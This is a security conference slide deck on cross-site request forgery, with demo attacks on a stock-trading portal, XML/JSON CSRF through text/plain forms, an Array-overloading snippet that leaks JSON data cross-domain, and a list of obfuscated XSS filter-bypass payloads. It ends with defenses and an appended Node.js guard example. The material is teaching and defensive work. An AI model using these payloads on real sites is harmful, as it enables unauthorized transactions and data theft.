[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

  1. Session J7 Demo – CSRF: The Biggest Little Vulnerability on the Web
  2. Who Am I? Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – Past experience – Net Square, Chase, IBM & Foundstone. Interest – Web security research. Published research – Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc. – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. – Advisories – .Net, Java servers etc. Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA; Hacking Web Services; Web Hacking. © Blueinfy Solutions Pvt. Ltd.
  3. Both real and possible. It all can happen while you are browsing, without your consent: bank account transfer; buy call for stocks; password changes on your email account; placing an order on your online auction site; ….more….
  4. Myth… "We have authentication in place." "We do proper session management." "We are over SSL and entertain just POST requests." "We use a secure browser."
  5. How? All popular browsers can make cross domain calls. Browsers replay cookies to the same domain. The browser manages authentication as well. Result: CSRF.
  6. Demo. Quick look at the case of a stock trading portal: adding stocks to a portfolio ☺
  7. Agenda: State of Application Security and Role of CSRF; CSRF Introduction and Cross Domain Calls; CSRF attack; CSRF and Web 2.0; Defense against CSRF; Conclusion. We will have concepts, examples and demos.
  8. Application Security State: CSRF on the rise
  9. Hacks & Attacks
  10. Attack vectors and types. Source: Web Application Security Consortium (WASC)
  11. Trends… Server side hacking is getting tougher with central defense. Attacks on the client side – XSS and CSRF – help in identity stealing. Both exploits and frameworks are available.
  12. CSRF – "Sleeping giant". "A sleeping giant is still a giant." Entered into the OWASP Top 10 and Mitre Corp.'s Common Vulnerability and Exposures (CVE) list. XSS and CSRF can be twin evils: having XSS, one gets CSRF free anyway. CSRF defense is difficult.
  13. Real Cases and Attacks
  14. Web 2.0 – Adding fuel to the fire. 80% of companies are investing in Web Services as part of their Web 2.0 initiative (McKinsey 2007 Global Survey). By the end of 2007, 30 percent of large companies have some kind of Web 2.0-based business initiative up and running (Gartner). In 2008, Web Services or Service-Oriented Architecture (SOA) would surge ahead (Gartner).
  15. Root cause of Vulnerabilities. CSRF is somewhere in-between: protocol? browser? programming? [Chart: CSI Security Survey – Vulnerability Distribution: programming errors 64%; misconfiguration and other problems 36%]
  16. CSRF – Basics
  17. CSRF. Cross Site Request Forgery (CSRF), also known as XSRF. Several other names for the same vector, like "sea surf", session riding, one-click attack etc… The results are the same.
  18. CSRF scenario [diagram: the web client sends a login request to the banking application (web app + DB); the server authenticates and hands out the session id SESSID=190832mkidw]
  19. CSRF scenario [diagram: the web client requests the transaction page carrying SESSID=190832mkidw; the server performs the transaction on that session id]
  20. CSRF scenario [diagram: the web client browses to a malicious site and loads a page there, while still holding SESSID=190832mkidw for the banking application]
  21. CSRF scenario [diagram: the loaded page forces a request to the transaction page; the server sees SESSID=190832mkidw and the transaction is done on that session id]
  22. Cross Domain Call. Why? – Cross domain calls work. What about the Same Origin Policy (SOP)? Is it a bypass of it? – For CSRF success.
  23. Cross Domain Access and Same Origin Policy (SOP)
  24. Cross Domain. Browser & cross domain access – an issue. How to access cross domain information from the browser? Browsers follow the same origin policy; this policy protects the browser against security and privacy problems. Ajax and RIA brought this issue to the front end: it is important for them to access cross domain resources.
  25. Same Origin Policy. The same origin policy is followed by all browsers. The policy dates from Netscape Navigator 2.0. Two pages have the same origin if the protocol, port (if given), and host are the same for both pages. document.domain – DOM reference point.
  26. Example: [Success] [Fail – protocol] [Fail – port] [Fail – host]. The origin check is done by comparing with document.domain – part of the DOM.
  27. Should not work [diagram: the client logs in (user/pass) to the Trading Site and receives an authentication cookie; a News Site trying to reach the Trading Page is blocked (X)]
  28. Request generation
      IMG SRC: <img src="http://host/?command">
      SCRIPT SRC: <script src="http://host/?command">
      IFRAME SRC: <iframe src="http://host/?command">
  29. Request generation – 'Image' object
      <script>
      var foo = new Image();
      foo.src = "http://host/?command";
      </script>
  30. Request generation. It is possible to generate POST as well: a form can be built dynamically, and a button click from JavaScript is possible.
      <script type="text/javascript" language="JavaScript">;</script>
  31. CSRF Attack
  32. Attacking with CSRF
  33. Logging in
      Request:
      POST /trade/login.aspx HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20070713 Firefox/
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 300
      Connection: keep-alive
      Referer:
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 34

      user=rob&pass=iamrob&Submit=Submit

      Response:
      HTTP/1.x 200 OK
      Date: Mon, 23 Jul 2007 04:10:29 GMT
      Server: Microsoft-IIS/6.0
      X-Powered-By: ASP.NET
      X-AspNet-Version: 2.0.50727
      Set-Cookie: ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1; path=/;
      Cache-Control: private
      Content-Type: text/html; charset=utf-8
  34. Placing an order
      GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20070713 Firefox/
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 300
      Connection: keep-alive
      Referer:
      Cookie: ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1
  35. Victim on another site
      <html>
      <head></head>
      <body>
      Welcome to our auction portal. We have some great products for which you can bid. <br>
      Enjoy!
      <iframe src='' id='xsfr' name='CSRF' style="width:0px; height:0px; border: 0px"></iframe>
      </body>
      </html>

      The request the browser sends while the page loads:
      GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20070713 Firefox/
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 300
      Connection: keep-alive
      Referer:
      Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245
  36. Victim with POST request
      <FORM NAME="buy" action="./buy.aspx" METHOD="POST">
      <input type="hidden" name="symbol" value="GOOG">
      <input type="hidden" name="units" value="50">
      </FORM>
      <script>;</script>

      The resulting request:
      POST /trade/buy.aspx HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv: Gecko/20070725 Firefox/
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 300
      Connection: keep-alive
      Referer:
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 20

      symbol=GOOG&units=50
  37. Obfuscation to bypass controls
      ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  38. Obfuscation to bypass controls
      <SCRIPT SRC=http://url/xss.js></SCRIPT>
      <IMG SRC="javascript:alert('XSS');">
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=JaVaScRiPt:alert('XSS')>
      <IMG SRC=javascript:alert(&quot;XSS&quot;)>
      <IMG SRC=`javascript:alert("XSS")`>
      Image tag malformed – <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  39. Obfuscation to bypass controls
      <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
      Unicode encoding – <IMG SRC=javascript&#58;alert&#40;'XSS')>
  40. Obfuscation to bypass controls
      UTF-8 – <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  41. Obfuscation to bypass controls
      Hex – <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
      XSS breakup (whitespace inside the scheme) – <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');">
  42. CSRF and Web 2.0
  43. Web 2.0 and CSRF. Web 2.0 applications can be vulnerable to different types of CSRF; it can come with different structures. One needs to look at that as well.
  44. Architecture
  45. Architecture – Layers [diagram: Browser (HTML/CSS, JavaScript, DOM, Ajax, Flash / RIA, Widget); Structures (XML, JSON); Protocols (JSON-RPC, XML-RPC, SOAP, REST, HTTP(S)); Server-Side (Services, SaaS, Open APIs)]
  46. Web 2.0 Changes – Application Infrastructure (vector: Web 1.0 → Web 2.0).
      Protocols: HTTP & HTTPS → SOAP, XML-RPC, REST etc. over HTTP & HTTPS.
      Information structures: HTML transfer → XML, JSON, JS Objects etc.
      Communication methods: Synchronous, Postback, Refresh and Redirect → Asynchronous & Cross domains (proxy).
      Information sharing: Single place (no urge for integration) → Multiple sources (urge for an integrated information platform).
  47. Ajax/RIA call – Asynchronous JavaScript and XML [diagram: browser (HTML / CSS / Flash, JS / DOM) → XMLHttpRequest (XHR), asynchronous over HTTP(S) → Web Server → Database / Resource / Middleware, returning XML / Text]
  48. Web 2.0 Structures & Cross Domain Calls
  49. Application Structures. Ajax runs with various different structures (JSON, Array, JS-Object etc.), and developers are adding various different calls and methods for it. JavaScript can talk with back end sources; mashup applications talk with various sources. This has significant security impact. Identifying and discovering structures, and CSRF.
  50. CSRF with various streams: JSON, XML, JS-Script, JS-Object, JS-Array
  51. Addressing Cross Domain Calls – CSRF opening. Cross domain calls are very important for Web 2.0 applications: a proxy to talk with the cross domain; a callback implementation to fetch them; Flash via crossdomain.xml. These are types of bypass and can have security implications. Source of the information – key!
  52. Cross Domain with proxy
  53. Callback Implementation • Portals like Yahoo and Google are supporting this. • Possible to bypass the SOP and make cross domain calls. • Security at stake [browser layer].
  54. CSRF for 2.0
  55. Cross Site Request Forgery (CSRF). What is different with Web 2.0? – Is it possible to do CSRF to an XML stream? – How? – It will be a POST hitting the XML processing resources like Web Services. – JSON CSRF is also possible. – An interesting check to make against application and Web 2.0 resources.
  56–59. One Way CSRF Scenario [four diagram slides; images not extracted]
  60. One-Way CSRF
  61. One-Way CSRF
      <html>
      <body>
      <FORM NAME="buy" ENCTYPE="text/plain" action=" em" METHOD="POST">
      <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>sto</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
      </FORM>
      <script>;</script>
      </body>
      </html>
  62. Forcing XML. Splitting the XML stream across the form's field name and value. Possible through XForms as well. A similar technique is applicable to JSON as well.
  63. Similar with JSON
      {"symbol": "MSFT", "units": "20", "comment": "none"}

      <FORM NAME="buy" ENCTYPE="text/plain" action="" METHOD="POST">
      <input type="hidden" name='{"symbol": "MSFT", "units": "20", "comment": "' value='no"}'>
      </FORM>
      <script>;</script>

      POST /trade/ajax-buy/buy.aspx HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv: Gecko/20070725 Firefox/
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 300
      Connection: keep-alive
      Referer:
      Content-Type: text/plain
      Content-Length: 53

      {"symbol": "MSFT", "units": "20", "comment": "=no"}
  64. Two-Way CSRF. One-Way – just making a forceful request. Two-Way – reading the data coming back from the target; maybe getting hold of important information – profile, statements, numbers etc. Is it possible with JSON/XML?
  65–66. Two-Way CSRF [diagram slides; images not extracted]
  67. Two-Way CSRF. The application is serving various streams like JSON, JS-Object, Array etc.
  68. Two-Way CSRF. An attacker page can make a cross domain request using SCRIPT (Firefox). The following code can overload the array stream:
      function Array() {
        var obj = this;
        var index = 0;
        for (j = 0; j < 4; j++) {
          obj[index++] setter = spoof;
        }
      }
      function spoof(x) {
        send(x.toString());
      }
  69. Two-Way CSRF
  70. Two-Way CSRF. It is possible to overload these objects; reading and sending to a cross domain is possible. This opens up a two way channel for an attacker. Web 2.0 streams are vulnerable to these attacks.
  71. Scenario [diagram: the attacker posts malicious code to a blog feed; the vulnerable JSON stream comes through the web app's proxy (web server + DB) into the web client, which is the CSRF target]
  72. Web 2.0 Components. There are various other components of Web 2.0 applications that can serve as CSRF payload: RSS feeds, mashups, widgets, blogs, Flash based components.
  73. RSS feeds. RSS feeds come into the application from various untrusted sources. Feed readers are part of 2.0 applications and are vulnerable to XSS or CSRF: malicious code can be executed in the browser. Several vulnerabilities reported.
  74. RSS feeds
  75. Mashups. API exposure for the mashup supplier application. Cross domain access by callback may cause CSRF. The mashup application can be a man in the middle, so it can't be trusted, or must be a trusted one.
  76. Widgets/Gadgets. The DOM sharing model can cause many security issues. One widget changing information on another widget – possible. CSRF injection through widget code.
  77. Blogs. Blogs are common in Web 2.0 applications, and many applications are plugging in third party blogs. One needs to check these blogs – CSRF is common with blogging applications.
  78. Defense against CSRF
  79. Unique tokens. URL tokens – dynamically generated. Form tokens – hidden:
      <input type="submit" class="submit" value="Login" />
      <input type="hidden" name="formToken" value="d5cb8550af604bfb103dae89445fde69">
  80. Captchas. Can have image/text based captchas for important forms; this adds protection against CSRF. Banking and financial applications can add several transaction ids for users.
  81. Referer check. Check the referrer to identify where requests are coming from; only requests from the same domain or from a specific resource should be entertained. Referer:
  82. Session and Logout. Client side – self defense: log out after activities at the earliest; do banking and other critical operations from a separate browser; browse from a VM. On the server side, session duration should be short.
  83. Web 2.0 Specific. Server side checks – check the client's content-type: XHR calls – xml/application; native calls – text/html; filtering is possible on it. Client side checks – the stream can be started and terminated by /* or any predefined characters; the client can remove them before injecting into the DOM.
  84. Warning. The discussed countermeasures are not bullet proof but raise the bar. There is no perfect security for CSRF – browsers are designed and work in a way that allows CSRF. XSS on the site gives leverage for CSRF – No XSS!
  85. Conclusion. CSRF is indeed a sleeping giant. Understanding is important, and countermeasures need to be put in place at code level. No fool-proof defense is available, but there are ways to protect applications or parts of applications. Web 2.0 adds a new dimension to CSRF.
  86. Questions
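The two Web 2.0 checks of slide 83, as an added Node.js example that is not part of the presentation or of Blueinfy's code: the content-type filter turns away the text/plain form of slide 63, and the /* … */ guard around the stream blocks the SCRIPT-based reading of slide 68. FORM_TYPES, acceptAjaxRequest, wrapStream, unwrapStream and the portfolio data are this example's own.

```javascript
// The only content types a cross-site <form> can produce. A real XHR client
// sets application/json (or text/xml) itself, so an Ajax endpoint can reject these.
const FORM_TYPES = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];

// Server side: accept the request only if its Content-Type is the one the
// application's own XHR code sends (parameters after ";" are ignored).
function acceptAjaxRequest(headers, expected = 'application/json') {
  const ct = (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  if (ct === '' || FORM_TYPES.includes(ct)) return false;
  return ct === expected;
}

// Server side: send the stream inside a comment. Pulled in through <script src>
// from another origin, the whole body is a comment and an overloaded Array
// constructor never sees the data. A "*/" inside the data would end the comment
// early, so it is escaped as "*\/" (still a valid JSON escape of "/").
const GUARD_OPEN = '/*';
const GUARD_CLOSE = '*/';
function wrapStream(data) {
  return GUARD_OPEN + JSON.stringify(data).replace(/\*\//g, '*\\/') + GUARD_CLOSE;
}

// Client side: the same-origin XHR handler strips the guard before parsing and
// refuses to inject anything that does not carry it.
function unwrapStream(body) {
  if (!body.startsWith(GUARD_OPEN) || !body.endsWith(GUARD_CLOSE)) {
    throw new Error('stream missing guard');
  }
  return JSON.parse(body.slice(GUARD_OPEN.length, body.length - GUARD_CLOSE.length));
}

// Constructed portfolio data standing in for the slides' JSON/array stream.
const SAMPLE_PORTFOLIO = [{ symbol: 'MSFT', units: 20 }, { symbol: 'GOOG', units: 50 }];
```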